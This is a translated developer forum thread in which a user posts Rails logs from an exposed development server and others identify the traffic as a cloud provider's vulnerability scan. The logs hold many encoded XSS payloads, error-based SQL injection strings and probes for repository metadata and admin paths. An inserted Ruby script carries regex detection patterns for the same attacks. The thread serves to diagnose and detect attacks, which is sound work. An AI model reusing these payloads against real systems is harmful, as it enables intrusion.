Chit-chat: Live: someone is trying to brute-force my development server

pynix · 2016-06-23 · last reply by pynix on 2016-06-23 · 6406 views

I mapped my development server to the public internet. I'm definitely not refreshing anything, yet the log keeps scrolling. Could you all take a look and tell me whether someone is scanning it or trying to brute-force something...

Started GET "/providers/1/.DS_Store" for 121.42.0.17 at 2016-06-23 05:12:02 +0800
Started GET "/providers/1/.svn/entries" for 121.42.0.17 at 2016-06-23 05:12:05 +0800
Started GET "/providers/1/.git/config" for 121.42.0.17 at 2016-06-23 05:12:12 +0800
Started GET "/providers/1/.htaccess" for 121.42.0.17 at 2016-06-23 05:12:35 +0800
Started GET "/providers/1/index.php?disp=dynamic" for 121.42.0.17 at 2016-06-23 05:12:54 +0800
Started GET "/providers/1/phpsysinfo/index.php?disp=dynamic" for 121.42.0.17 at 2016-06-23 05:12:58 +0800
Started GET "/providers/1/.bzr/branch-format" for 121.42.0.17 at 2016-06-23 05:13:18 +0800
Started GET "/providers/1/.hg/requires" for 121.42.0.17 at 2016-06-23 05:13:36 +0800
Started GET "/providers/1/CVS/Root" for 121.42.0.17 at 2016-06-23 05:13:49 +0800
Started GET "/providers/1/uc_server/uctools.php" for 121.42.0.17 at 2016-06-23 05:14:00 +0800
Started GET "/providers/1/download/" for 121.42.0.17 at 2016-06-23 05:14:44 +0800
Started GET "/providers/1/downloads/" for 121.42.0.17 at 2016-06-23 05:14:48 +0800
Started GET "/providers/1/bin/" for 121.42.0.17 at 2016-06-23 05:14:51 +0800
Started GET "/providers/1/htdocs/" for 121.42.0.17 at 2016-06-23 05:15:14 +0800
Started GET "/providers/1/upfile/" for 121.42.0.17 at 2016-06-23 05:15:29 +0800
Started GET "/providers/1/upfiles/" for 121.42.0.17 at 2016-06-23 05:15:38 +0800
Started GET "/providers/1/uploadfile/" for 121.42.0.17 at 2016-06-23 05:16:06 +0800
Started GET "/providers/1/uploadfiles/" for 121.42.0.17 at 2016-06-23 05:16:27 +0800
Started GET "/providers/1/web/" for 121.42.0.17 at 2016-06-23 05:16:30 +0800
Started GET "/providers/1/data/" for 121.42.0.17 at 2016-06-23 05:16:32 +0800
Started GET "/providers/1/backup/" for 121.42.0.17 at 2016-06-23 05:17:29 +0800
Started GET "/providers/1/uploads/" for 121.42.0.17 at 2016-06-23 05:17:49 +0800
Started GET "/providers/1/upload/" for 121.42.0.17 at 2016-06-23 05:17:54 +0800
Started GET "/providers/1/config/" for 121.42.0.17 at 2016-06-23 05:17:59 +0800
Started GET "/providers/1/logs/" for 121.42.0.17 at 2016-06-23 05:18:06 +0800
Started GET "/providers/1/log/" for 121.42.0.17 at 2016-06-23 05:18:09 +0800
Started GET "/providers/1/comments?page=2" for 121.42.0.17 at 2016-06-23 05:18:12 +0800
Started GET "/cgi-bin/authlogin.cgi" for 121.42.0.17 at 2016-06-23 05:18:24 +0800
Started GET "/cgi-bin/it.cgi" for 121.42.0.17 at 2016-06-23 05:18:30 +0800
Started GET "/cgi-bin/test-cgi" for 121.42.0.17 at 2016-06-23 05:18:30 +0800
Started GET "/cgi-sys/defaultwebpage.cgi" for 121.42.0.17 at 2016-06-23 05:18:30 +0800
Started GET "/cgi-sys/FormMail-clone.cgi" for 121.42.0.17 at 2016-06-23 05:18:31 +0800
Started GET "/xampp/cgi.cgi" for 121.42.0.17 at 2016-06-23 05:18:41 +0800
Started GET "/providers/1/bigdump.php" for 121.42.0.17 at 2016-06-23 05:18:44 +0800
Started GET "/providers/1/adminer.php" for 121.42.0.17 at 2016-06-23 05:18:45 +0800
Started GET "/providers/1/phpinfo.php" for 121.42.0.17 at 2016-06-23 05:19:01 +0800
Started GET "/providers/1/info.php" for 121.42.0.17 at 2016-06-23 05:19:11 +0800
Started GET "/providers/1/php.php" for 121.42.0.17 at 2016-06-23 05:19:12 +0800
Started GET "/providers/1/test.php" for 121.42.0.17 at 2016-06-23 05:19:14 +0800
Started GET "/providers/1/show.php" for 121.42.0.17 at 2016-06-23 05:19:15 +0800
Started GET "/providers/1/index.php" for 121.42.0.17 at 2016-06-23 05:19:16 +0800
Started GET "/providers/1/a.php" for 121.42.0.17 at 2016-06-23 05:19:19 +0800
Started GET "/providers/1/1.php" for 121.42.0.17 at 2016-06-23 05:19:24 +0800
Started GET "/providers/1/u.php?act=phpinfo" for 121.42.0.17 at 2016-06-23 05:19:25 +0800
Started GET "/providers/1/l.php?act=phpinfo" for 121.42.0.17 at 2016-06-23 05:19:26 +0800
Started GET "/providers/1/tz.php?act=phpinfo" for 121.42.0.17 at 2016-06-23 05:19:27 +0800
Started GET "/providers/1/app/dev/svinfo.php?phpinfo=true" for 121.42.0.17 at 2016-06-23 05:19:30 +0800
Started GET "/providers/1/install/svinfo.php?phpinfo=true" for 121.42.0.17 at 2016-06-23 05:19:32 +0800
Started GET "/providers/1/comments?page=2i1346253i" for 121.42.0.17 at 2016-06-23 05:19:47 +0800
Started GET "/providers/1/comments?page=%27%22/%3E%3C/body%3E%3Cbody+onload=prompt()%3E" for 121.42.0.17 at 2016-06-23 05:19:49 +0800
Started GET "/providers/1/comments?page=%27%22%2f%3E%3C%2fbody%3E%3Cbody%20onload%3dprompt%28%29%3e" for 121.42.0.17 at 2016-06-23 05:19:54 +0800
Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253C%252fbody%253E%253Cbody%2520onload%253dprompt%2528%2529%253e" for 121.42.0.17 at 2016-06-23 05:19:57 +0800
Started GET "/providers/1/comments?page=javascript:alert(1987)" for 121.42.0.17 at 2016-06-23 05:20:00 +0800
Started GET "/providers/1/comments?page=javascript%3Aalert%281987%29" for 121.42.0.17 at 2016-06-23 05:20:02 +0800
Started GET "/providers/1/comments?page=javascript%253Aalert%25281987%2529" for 121.42.0.17 at 2016-06-23 05:20:04 +0800
Started GET "/providers/1/comments?page=%27%22/%3E%3Cimg/src/onerror=alert()%3E" for 121.42.0.17 at 2016-06-23 05:20:05 +0800
Started GET "/providers/1/comments?page=%27%22%2f%3E%3Cimg%2fsrc%2fonerror%3Dalert%28%29%3E" for 121.42.0.17 at 2016-06-23 05:20:07 +0800
Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253Cimg%252fsrc%252fonerror%253Dalert%2528%2529%253E" for 121.42.0.17 at 2016-06-23 05:20:08 +0800
Started GET "/providers/1/comments?page=%27%22+onmouseover=alert()+d=%27%22" for 121.42.0.17 at 2016-06-23 05:20:14 +0800
Started GET "/providers/1/comments?page=%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22" for 121.42.0.17 at 2016-06-23 05:20:15 +0800
Started GET "/providers/1/comments?page=%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522" for 121.42.0.17 at 2016-06-23 05:20:17 +0800
Started GET "/providers/1/comments?page=%27%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E" for 121.42.0.17 at 2016-06-23 05:20:20 +0800
Started GET "/providers/1/comments?page=%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E" for 121.42.0.17 at 2016-06-23 05:20:22 +0800
Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E" for 121.42.0.17 at 2016-06-23 05:20:25 +0800
Started GET "/providers/1/comments?page=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" for 121.42.0.17 at 2016-06-23 05:20:34 +0800
Started GET "/providers/1/comments?page=amF2YXNjcmlwdDpwcm9tcHQoMTExKTt4" for 121.42.0.17 at 2016-06-23 05:20:38 +0800
Started GET "/providers/1/'%22+onmouseover=alert()+d='%22" for 121.42.0.17 at 2016-06-23 05:20:49 +0800
Started GET "/providers/1/%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22" for 121.42.0.17 at 2016-06-23 05:20:50 +0800
Started GET "/providers/1/%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522" for 121.42.0.17 at 2016-06-23 05:20:51 +0800
Started GET "/providers/1/comments/'%22+onmouseover=alert()+d='%22/?page=2" for 121.42.0.17 at 2016-06-23 05:20:52 +0800
Started GET "/providers/1/comments/%27%22%20onmouseover%3Dalert%28%29%20d%3D%27%22/?page=2" for 121.42.0.17 at 2016-06-23 05:20:53 +0800
Started GET "/providers/1/comments/%2527%2522%2520onmouseover%253Dalert%2528%2529%2520d%253D%2527%2522/?page=2" for 121.42.0.17 at 2016-06-23 05:20:55 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Ciframe%20onload=alert()%3E" for 121.42.0.59 at 2016-06-23 05:20:57 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Cimg%20src=x%20onerror=prompt()%3E" for 121.42.0.57 at 2016-06-23 05:21:03 +0800
Started GET "/providers/1/comments?page=2%27%22%3E%3Csvg%20onload=prompt()%3E" for 121.42.0.56 at 2016-06-23 05:21:05 +0800
Started GET "/providers/1/comments?page=2" for 121.42.0.58 at 2016-06-23 05:21:10 +0800
Started GET "/providers/1/'%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E" for 121.42.0.17 at 2016-06-23 05:21:16 +0800
Started GET "/providers/1/%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E" for 121.42.0.17 at 2016-06-23 05:21:21 +0800
Started GET "/providers/1/%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E" for 121.42.0.17 at 2016-06-23 05:21:26 +0800
Started GET "/providers/1/comments/'%22/%3E%3C/script%3E%3Cscript%3Ealert()%3C/script%3E/?page=2" for 121.42.0.17 at 2016-06-23 05:21:39 +0800
Started GET "/providers/1/comments/%27%22%2f%3E%3C%2fscript%3E%3Cscript%3Ealert%28%29%3C%2fscript%3E/?page=2" for 121.42.0.17 at 2016-06-23 05:21:46 +0800
Started GET "/providers/1/comments/%2527%2522%252f%253E%253C%252fscript%253E%253Cscript%253Ealert%2528%2529%253C%252fscript%253E/?page=2" for 121.42.0.17 at 2016-06-23 05:22:11 +0800

Is anyone still around at this hour?

Looks like they're running some kind of script...

Seems to have stopped...

Started GET "/assets/comment.self-a83bf9a48d4041b88d657467a04993e60634cfb47d584d351bbd5ceb021ee1a1.js?body=1%27+AND+%28SELECT+1424+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x48774c484568%2C%28SELECT+%28CASE+WHEN+%281424%3D1424%29+THEN+1+ELSE+0+END%29%29%2C0x704662466f45%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29+AND+%27SPp%27%3D%27SPp" for 121.42.0.17 at 2016-06-23 05:59:31 +0800
Cannot render console from 121.42.0.17! Allowed networks: 127.0.0.1, ::1, 127.0.0.0/127.255.255.255


Started GET "/assets/comment.self-a83bf9a48d4041b88d657467a04993e60634cfb47d584d351bbd5ceb021ee1a1.js?body=1+AND+%28SELECT+1424+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x48774c484568%2C%28SELECT+%28CASE+WHEN+%281424%3D1424%29+THEN+1+ELSE+0+END%29%29%2C0x704662466f45%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29--+SPp" for 121.42.0.17 at 2016-06-23 05:59:32 +0800
Cannot render console from 121.42.0.17! Allowed networks: 127.0.0.1, ::1, 127.0.0.0/127.255.255.255


Started GET "/assets/comment.self-a83bf9a48d4041b88d657467a04993e60634cfb47d584d351bbd5ceb021ee1a1.js?body=1%25%27+AND+%28SELECT+1424+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x48774c484568%2C%28SELECT+%28CASE+WHEN+%281424%3D1424%29+THEN+1+ELSE+0+END%29%29%2C0x704662466f45%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27" for 121.42.0.17 at 2016-06-23 05:59:32 +0800
Cannot render console from 121.42.0.17! Allowed networks: 127.0.0.1, ::1, 127.0.0.0/127.255.255.255


Started GET "/assets/comment.self-a83bf9a48d4041b88d657467a04993e60634cfb47d584d351bbd5ceb021ee1a1.js?body=1%27%29+AND+%28SELECT+1424+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x48774c484568%2C%28SELECT+%28CASE+WHEN+%281424%3D1424%29+THEN+1+ELSE+0+END%29%29%2C0x704662466f45%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29+AND+%28%27SPp%27%3D%27SPp" for 121.42.0.17 at 2016-06-23 05:59:33 +0800
Cannot render console from 121.42.0.17! Allowed networks: 127.0.0.1, ::1, 127.0.0.0/127.255.255.255


Is this a scan for SQL injection? Too bad it landed on a static file...
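As an added example (not code from the thread or from the poster), here is a small Ruby script that triages Rails request-log lines of the shape pasted above, percent-decodes each target repeatedly (the scanner sent both single- and double-encoded payloads), and tallies per source IP which probe classes it matched: version-control metadata, PHP/CGI probes, directory guessing, XSS payloads and SQL injection. The signature list, the threshold and the sample lines are constructed for this example and use RFC 5737 documentation addresses.

```ruby
require 'cgi'
# Added example: parse Rails lines shaped like  Started GET "/path?q" for IP at TIME
LINE_RE = /\AStarted (\w+) "([^"]*)" for (\S+) at (.+)\z/

# Percent-decode until stable: the scanner sent %27 as well as %2527.
def fully_decode(str)
  5.times do
    decoded = CGI.unescape(str)
    return decoded if decoded == str
    str = decoded
  end
  str
end

# Constructed signatures for the probe classes seen in the thread's log.
SIGNATURES = {
  vcs_leak:  %r{/\.(git|svn|hg|bzr)/|/CVS/|/\.DS_Store|/\.htaccess}i,
  php_probe: %r{\.php(\?|\z)|/cgi-(bin|sys)/}i,
  dir_probe: %r{/(backup|upload\w*|upfiles?|config|logs?|data|bin|htdocs|download\w*)/\z}i,
  xss:       %r{<(script|img|svg|iframe|body)\b|\bon(load|error|mouseover)=|javascript:}i,
  sqli:      %r{\bAND\s*\(SELECT\b|INFORMATION_SCHEMA|FLOOR\(RAND\(}i,
}.freeze

# Returns { ip => { category => count } }; lines matching no signature are ignored.
def triage(log_text)
  report = Hash.new { |h, ip| h[ip] = Hash.new(0) }
  log_text.each_line do |raw|
    m = LINE_RE.match(raw.strip) or next
    _verb, target, ip, _time = m.captures
    decoded = fully_decode(target)
    SIGNATURES.each { |cat, re| report[ip][cat] += 1 if decoded.match?(re) }
  end
  report
end

# Source IPs whose flagged request count reaches the threshold (constructed default).
def noisy_sources(report, threshold: 5)
  report.select { |_ip, cats| cats.values.sum >= threshold }.keys
end

# Constructed sample lines modelled on the thread's log (RFC 5737 addresses).
SAMPLE_LOG = <<~LOG
  Started GET "/providers/1/.git/config" for 198.51.100.7 at 2016-06-23 05:12:12 +0800
  Started GET "/providers/1/phpinfo.php" for 198.51.100.7 at 2016-06-23 05:19:01 +0800
  Started GET "/providers/1/backup/" for 198.51.100.7 at 2016-06-23 05:17:29 +0800
  Started GET "/providers/1/comments?page=%2527%2522%252f%253E%253Csvg%2520onload%253dprompt%2528%2529%253e" for 198.51.100.7 at 2016-06-23 05:21:05 +0800
  Started GET "/assets/app.js?body=1%27+AND+%28SELECT+1+FROM+INFORMATION_SCHEMA.CHARACTER_SETS%29--+x" for 198.51.100.7 at 2016-06-23 05:59:31 +0800
  Started GET "/providers/1/comments?page=2" for 203.0.113.9 at 2016-06-23 05:18:12 +0800
LOG
```

Run it against `triage(File.read("log/development.log"))` and the benign pagination request stays out of the report, while the scanning host shows one hit in each of the five classes.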

Started GET "/assets/backup/" for 121.42.0.17 at 2016-06-23 06:17:05 +0800

Tragic... Time to change the domain...

Forget about changing the domain; this is ittun.com's fault...

There's something fishy about the SSL certificate...

This looks like Alibaba Cloud's Yundun (Cloud Shield) scanning.

You can check the reverse proxy logs, e.g. the nginx log; the default configuration records the request's user agent. Requests from Yundun contain a keyword like Alibaba.Security.Heimdall.

Judging by the URLs, it looks like a scan for admin backend paths.

This is perfectly normal. Basically every website gets scanned eight or ten times a day. Don't panic...

https://help.aliyun.com/knowledge_detail/5975223.html

This is the vulnerability scanning service of Yundun Situation Awareness. If you don't want to be scanned, you can open a support ticket to resolve it.

So it's just these routine scanning techniques after all; I thought Yundun was something special...

#10 @pynix May I ask what tool you used to look up the information in the screenshot?
